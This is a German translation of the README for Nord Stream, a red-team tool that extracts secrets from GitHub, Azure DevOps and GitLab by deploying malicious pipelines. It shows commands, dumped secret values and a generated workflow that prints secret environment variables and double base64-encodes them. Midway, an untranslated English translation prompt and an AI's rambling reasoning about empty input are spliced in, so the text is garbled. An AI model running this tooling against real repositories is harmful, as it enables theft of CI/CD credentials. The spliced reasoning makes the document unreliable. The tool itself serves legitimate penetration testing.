
Nord Stream ist ein Tool, mit dem du Geheimnisse extrahieren kannst, die in CI/CD-Umgebungen gespeichert sind, indem du bösartige Pipelines bereitstellst. Es unterstützt derzeit Azure DevOps, GitHub und GitLab.
Nord Stream ist ein Tool, mit dem du in CI/CD-Umgebungen gespeicherte Geheimnisse extrahieren kannst, indem du bösartige Pipelines bereitstellst.
Es unterstützt derzeit Azure DevOps, GitHub und GitLab.
Weitere Informationen findest du im folgenden Blogbeitrag: https://www.synacktiv.com/publications/cicd-secrets-extraction-tips-and-tricks
$ pipx install git+https://github.com/synacktiv/nord-stream
`git` ist ebenfalls erforderlich (siehe https://git-scm.com/download/) und muss in Ihrem `PATH` vorhanden sein.
## Verwendung
Hier ist ein einfaches Beispiel auf GitHub; zunächst kann man die verschiedenen Geheimnisse auflisten.```sh
$ nord-stream github --token "$GHP" --org org --list-secrets --repo repo
[*] Listing secrets:
[*] "org/repo" secrets
[*] Repo secrets:
- REPO_SECRET
- SUPER_SECRET
[*] PROD secrets:
- PROD_SECRET
Fahren Sie dann mit der Exfiltration fort:```sh
$ nord-stream github --token "$GHP" --org org --repo repo
[+] "org/repo"
[] No branch protection rule found on "dev_remote_ea5Eu/test/v1" branch
[] Getting secrets from repo: "org/repo"
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] Secrets:
secret_SUPER_SECRET=value for super secret
secret_REPO_SECRET=repository secret
[] Getting secrets from environment: "PROD" (org/repo) [] Getting workflow output [!] Workflow not finished, sleeping for 15s [+] Workflow has successfully terminated. [+] Secrets: secret_PROD_SECRET=Value only accessible from prod environment
[] Cleaning logs. [] Check output: /home/hugov/Documents/pentest/RD/CICD/tools/nord-stream/nord-stream/nord-stream-logs/github
### Gemeinsame Argumente
Einige Argumente werden zwischen [GitHub](#github), [Azure DevOps](#azure-devops) und [GitLab](#gitlab) gemeinsam verwendet. Hier sind einige Beispiele.
#### Token beschreiben
Die Option `--describe-token` kann verwendet werden, um allgemeine Informationen über dein Token anzuzeigen:```bash
$ nord-stream github --token "$PAT" --describe-token
[*] Token information:
- Login: CICD
- IsAdmin: False
- Id: 1337
- Bio: None
Die Option --build-yaml kann verwendet werden, um eine Pipeline-Datei zu erstellen, ohne sie bereitzustellen. Sie ruft die verschiedenen Secret-Namen ab, um die zugehörige Pipeline zu erstellen, die zum Hinzufügen benutzerdefinierter Schritte verwendet werden kann:```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --env PROD --build-yaml custom.yml
[+] YAML file:
name: GitHub Actions
'on': push
jobs:
init:
runs-on: ubuntu-latest
steps:
- run: env -0 | awk -v RS='\0' '/^secret_/ {print $0}' | base64 -w0 | base64 -w0
name: command
env:
secret_PROD_SECRET: ${{secrets.PROD_SECRET}}
environment: PROD
#### YAML
Die Option `--yaml` kann verwendet werden, um eine benutzerdefinierte Pipeline bereitzustellen:```yml
name: GitHub Actions
'on': push
jobs:
init:
runs-on: ubuntu-latest
steps:
- run: echo "Hello from step 1"
name: step 1
- run: echo "Doing some important stuff here"
name: command
- run: echo "Hello from last step "
name: last step
Translate the following Kitploit tool content. This is chunk 13 of 51 from a longer Markdown document being translated in sequence. The source language is en. Target language: de. Content type: README chunk 13/51.
CHUNK-SPECIFIC RULES:
INPUT:
The user didn't provide the actual chunk content after "INPUT:". That is odd. Perhaps it's a mistake; the user might have intended to paste the chunk but forgot. As an AI, I should respond that there is no content to translate. However, the instructions say "Do not ask questions. Do not engage in conversation." and "Return ONLY the translated text." So I might need to assume the input is empty and return empty. But I cannot just output nothing. I'll output an empty response? But I must follow the rules: "Return ONLY the translated text." If there is no text, I have nothing to translate. I'll just return nothing. However, that might not satisfy the user's expectation. Since the prompt says "Translate the following Kitploit tool content." and then there's nothing, I'll output an empty string. The assistant's response should be just the raw translation, so if input is missing, I can't translate. I'll respond with an empty message, but I should not add any meta-text. So I'll simply output nothing. But sometimes the AI must still produce something. I'll output a space? No, I'll output an empty string.```bash
$ nord-stream github --token "$PAT" --org Synacktiv --repo repo --yaml custom.yml
[+] "synacktiv/repo"
[*] No branch protection rule found on "dev_remote_ea5Eu/test/v1"branch
[*] Running custom workflow: .../custom.yml
[*] Getting workflow output
[!] Workflow not finished, sleeping for 15s
[+] Workflow has successfully terminated.
[+] Workflow output:
2023-07-18T20:08:33.0073670Z ##[group]Run echo "Doing some important stuff here"
2023-07-18T20:08:33.0074247Z echo "Doing some important stuff here"
2023-07-18T20:08:33.0136846Z shell: /usr/bin/bash -e {0}
2023-07-18T20:08:33.0137261Z ##[endgroup]
2023-07-18T20:08:33.0422019Z Doing some important stuff here
[*] Cleaning logs.
[*] Check output: .../nord-stream-logs/github
Standardmäßig wird die Ausgabe der Aufgabe namens command des init-Jobs angezeigt, aber alles wird lokal gespeichert und kann manuell abgerufen werden:```bash
$ cat nord-stream-logs/github/synacktiv/repo/workflow_custom_2023-07-18_22-08-44/init/4_last\ step.txt
2023-07-18T20:08:33.0458509Z ##[group]Run echo "Hello from last step "
2023-07-18T20:08:33.0459084Z echo "Hello from last step "
2023-07-18T20:08:33.0511473Z shell: /usr/bin/bash -e {0}
2023-07-18T20:08:33.0511890Z ##[endgroup]
2023-07-18T20:08:33.0597853Z Hello from last step
#### Clean logs